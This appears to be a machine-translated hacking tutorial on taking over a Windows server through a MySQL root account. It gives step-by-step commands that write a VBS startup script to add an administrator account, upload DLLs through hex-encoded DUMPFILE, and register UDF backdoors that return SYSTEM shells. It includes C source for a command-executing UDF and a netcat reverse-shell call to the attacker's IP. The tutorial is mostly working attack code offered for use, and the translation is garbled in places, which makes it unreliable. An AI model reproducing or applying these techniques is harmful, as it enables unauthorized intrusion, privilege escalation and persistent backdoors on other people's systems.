1. Connect to each other MySQL server mysql-u root-h 192.168.0.1mysql.exe This program in the Bin directory where you installed MySQL
2. Let's take a look at some of the server database MySQL >show databases; MySQL default installation will have MySQL, test these two databases, if you see that there are other databases that is the user-built database.
3. Let's go to database MySQL >use test; we'll go into the test database
4. See what data tables we enter into the database MySQL >show tables; By default, no table exists in test.
The following are the key parts
5. Create a new table under the test database; MySQL >create table A (cmd text) Well, we created a new table with a table named A, with only one field in the table, the field named cmd, and text.
6. Inserting content into a table
Reference
The code is as follows |
Copy Code |
MySQL >insert into a values ("Set Wshshell=createobject (" "Wscript.Shell") "); MySQL >insert into a values ("A=wshshell.run" ("cmd.exe/c net user 1 1/add" ", 0)"); MySQL >insert into a values ("B=wshshell.run (" "Cmd.exe/c net localgroup Administrators 1/add" ", 0)"); |
Note the double quotes and parentheses and the "0" in the back must be entered! We will use these three commands to create a VBS script!
7. OK, now let's take a look at some of the things in table a MySQL >select * from A; we'll see that there are three rows of data in the table, that's what we just typed, make sure you typed it correctly, and we came to the next step.
8. Output table for a VBS script file MySQL >select * from A to outfile "c:\docume~1\alluse~1\" start "menu \ program \ boot \a.vbs; We enter the contents of our table into the Startup group, is a script file for VBS! Note the "" symbol.
9. See this everyone must know, is the use of MySQL output an executable file. Why not bat, because the start of the runtime will have a clear DOS window out, and the VBS script can completely hide the window without error prompts! Originally, there should be a sentence after the completion of the script automatically deleted this script, but the Chinese directory is really unable to deal with, only to forget! All right, find a tool to attack 135 and let the server reboot.
See the user operation below
Next, let's start by saying how to generate a binary file to upload a script. Take a look at this MySQL script code (User mix method):
The code is as follows |
Copy Code |
Set @a = Concat (", 0x0123abc1312389 ...); Set @a = Concat (@a,0x4658978abc545e ...); ...................... CREATE TABLE Mix (data Longblob)//build mix, field data, type Longblob INSERT into mix values (""); Update mix SET data = @a;//@a Insert Table Mix Select data from Mix to DumpFile ' C:\Winnt\ filename ';//export table contents as file
|
The first two are very familiar with, this is the time we injected before, bypassing the ' solution, the code 16 of the number of statements to a variable, and then import the variable on the line. Just here, because the 16 code is a file content, the code is too long, so use the CONCAT function to constantly add the last code class, so that the cumulative to a variable a. The next few words are very simple, I have a comment.
Script generated, how to upload? First login MySQL server:
code is as follows |
copy code |
C:>mysql–u root–h hostip–p Mysql>use mysql;//enter MySQL default database first, otherwise your next table You will not know which library Mysql> belong to;. E:*.dll.txt; Here's your MySQL script. Follow the above command, you can see the screen text quickly flashing (of course, fast speed), will not be your file old upload finished! below to reach our point, what DLL file do we upload? At present I see on the net have two already written DLL file, one is mix write Mix.dll, one is Envymask write My_udf.dll, these two I have used, are very good, but also a bit insufficient. Let's take a look at the specific use of the process first! First Use Mix.dll: Login to Mysql, enter the command: mysql>. E:mix.dll.txt mysql> Create FUNCTION mixconnect RETURNS STRING soname ' C:\windows\mix.dll '; //The registered Mixconnect here is the function implemented in our DLL file, we are going to execute the system command with him! Mysql> Select Mixconnect (' Your IP ', ' 8080 ');//fill in your Bounce IP and port |
After a while, you'll be listening to the 8080-port NC, and you'll get a system-privilege shell! As shown in Figure 1:
This is really good, through the rebound shell can pass some firewalls, unfortunately, its function is not written very well, can only perform once, when you connect the database second time, run again "select Mixconnect (' Your IP ', ' 8080 ') ;” When the other side of MySQL will be off! Error, then service Stop!
So, using Mix.dll you have only one success, no chance to do it again! In addition, according to my test, he does not seem to have any effect on the Win2003 system.
code is as follows |
copy code |
Mysql>. C:my_udf.dll.txt mysql> Create FUNCTION my_udfdoor RETURNS STRING soname ' C:\winnt\my_udf.dll '; Similarly, My_udfdoor is also the one we register to execute the system command function Mysql> select My_udfdoor (");//Here you can write the My_udfdoor parameters, which is equivalent to activating this function. Okay, now you don't have to shut the shell, we'll open a cmd, use: d:>nc hostip 3306 * |
4.0.*-nt x$eo~mcg F**k//See this, enter "F**k", he is the My_udfdoor default password, he cannot change
after a while, you have the shell of system privileges,
because he is the hook recv version, so wear The ability of the wall is very strong, I was in the last Mix.dll rebound failure situation, just use this get, he really did not lose hope! Into the system, found that it has a dual network card, Skynet firewall personal version of V2.73, open only 3306 ports, this shows that My_udf.dll really have a strong ability to penetrate the firewall! But he also has a bug, that is, after we connect to activate this function (that is, using the command "select My_udfdoor"); After that, regardless of whether you are connected, just execute:
Mysql>drop function My_udfdoor, Mysql also reported the wrong, then hang up,
so you use this DLL file can not remove your traces!
Finally, let's write a custom DLL file ourselves. See if we can solve the problem.
We only use the MySQL UDF sample as a template! Look at his example:
The code is as follows |
Copy Code |
#i nclude <stdlib.h> #i nclude <winsock.h> #i nclude <mysql.h> extern "C" { Char *my_name (udf_init *initid, Udf_args *args, Char *is_null, Char *error); Compatible C } Char *my_name (udf_init *initid, Udf_args *args, Char *is_null, Char *error) { char * me = "my Name"; return me; Calling this UDF will return my name }
|
Pretty simple, huh? OK, we just need to change it a little bit to get our own DLL file:
Here's one of my buddies. Crackme is modified:
code is as follows |
copy code |
#i nclude <stdlib.h> #i nclude <windows.h> #i nclude" mysql.h " extern" C "__declspec (dllexport) char *sys_name (udf_init *initid, Udf_args *args, Char *is_null, char *error);/sy S_name is the name of the function, you can modify the __declspec (dllexport) Char *sys_name arbitrarily (udf_init *initid, Udf_args *args, Char *is_null, Char *erro R)//Of course, the sys_name here must also be changed! { Char me[256] = {0}; if (Args->arg_count = = 1) { strncpy (me,args->args[0],args->lengths[0]); Me[args->lengths[0]]= '; WinExec (me,sw_hide);//Just use it to execute arbitrary commands }else strcpy (Me, do NONTHING.N); return me; } |
OK, we can compile it into Sysudf.dll file! Let's use him to experiment!
See Operation:
The code is as follows |
Copy Code |
Mysql>. C:sysudf.dll.txt Mysql>create function Sys_name returns string Soname ' C:\windows\sysudf.dll '; Mysql>. Nc.exe.txt//upload the Nc.exe too Mysql>select sys_name (' nc.exe-e cmd.exe my IP 8080 '); There is only one sys_name parameter that specifies the system command to execute |
Okay, look at a rebound shell in the Win2003,
Of course, you can also not bounce the shell, but to execute other commands, but whether or not the success of the execution, there is no echo, so to ensure that the command format correctly. For this DLL file, it is tested that any time "drop function Sys_name" is not an error, and you can run different commands multiple times. As for his shortcoming, his ability to penetrate the wall is not too strong as the Mix.dll, but for the wall that can't penetrate thoroughly, running other commands directly is the best choice.